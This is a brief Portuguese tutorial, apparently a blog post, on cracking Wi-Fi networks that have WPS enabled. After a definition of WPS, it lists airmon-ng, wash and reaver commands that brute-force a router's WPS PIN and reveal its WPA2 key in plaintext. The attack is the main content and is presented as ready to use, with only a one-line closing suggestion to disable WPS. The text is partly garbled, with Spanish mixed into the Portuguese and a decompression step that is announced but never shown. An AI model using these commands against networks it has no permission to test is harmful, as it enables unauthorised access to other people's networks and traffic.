WPS ou Wi-Fi Protected Setup como diz a Wikipedia WPS é um padrão promovido por a Wi-Fi Alliance para a criação de redes WLAN seguras. Em outras palavras, WPS não é um mecanismo de segurança por sí só, se trata da definição de diversos mecanismos para facilitar a configuração de una rede WLAN segura com WPA2, pensados para minimizar a intervenção do usuário em ambiente domésticos o pequenas oficinas (SOHO). Concretamente, WPS define os mecanismos a través dos quais os diferentes dispositivos da rede obtem as credenciais (SSID y PSK) necesarias para iniciar o processo de autenticação.
Vamos ao que interessa, primeiro baixem o Reaver.
Uma vez dentro da pasta onde descargamos Reaver deve-se descomprimi-lo:
airmon-ng start wlan0
wash -i mon0
reaver -i mon0 -b 00:00:00:00:00:00 -vv (Em este passo os dará o PIN, atentos)
reaver -i mon0 -b 00:00:00:00:00:00 -p PIN -vv (Os dará em texto plano a clave)
Este método de pegar a chave resulta um poco pesado, pois pode durar entre 1 e 3 horas dependendo da qualidade do sinal.
Os deixo com este vídeo que me serviu muito para realizar estas provas. E senhores desativem WPS de seus routers.
Para ver um tutorial mais explicado, CLIQUE AQUI